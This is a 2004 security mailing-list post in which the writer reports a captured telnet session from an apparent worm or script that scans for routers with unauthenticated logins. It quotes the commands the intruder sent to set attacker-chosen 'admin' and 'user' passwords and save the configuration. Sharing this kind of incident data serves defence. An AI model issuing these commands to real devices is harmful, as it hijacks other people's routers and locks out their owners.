Re: Strange authentication attempts

[John Narron <zeek () cdsinet net>]

In-Reply-To: <20040330164153.5848.qmail () www securityfocus com>

I've gathered some new information regarding this incident.

I've been watching port 23 coming in and out of my network and captured a session.  It appears to be some worm, trojan, 
or script thats seeking out a particular device that allows an unauthenticated login, then sets up a username and 
password and saves the configuration.  The commands are as follows:

config
system
password admin
13370n3z
13370n3z
password user
fawkoffsz
fawkoffsz
save

It appears to set up a user named 'admin' with a password of '13370n3z', and another user name 'user' with a password 
of 'fawkoffsz'.  I'm not sure what kind of device uses these sequence of commands, but I'm suspecting some sort of 
cable or DSL router (since a lot of those, still, come with unauthenticated logins).


---------------------------------------------------------------------------
Free 30-day trial: firewall with virus/spam protection, URL filtering, VPN,
wireless security

Protect your network against hackers, viruses, spam and other risks with Astaro
Security Linux, the comprehensive security solution that combines six
applications in one software solution for ease of use and lower total cost of
ownership.

Download your free trial at 
http://www.securityfocus.com/sponsor/Astaro_incidents_040301
----------------------------------------------------------------------------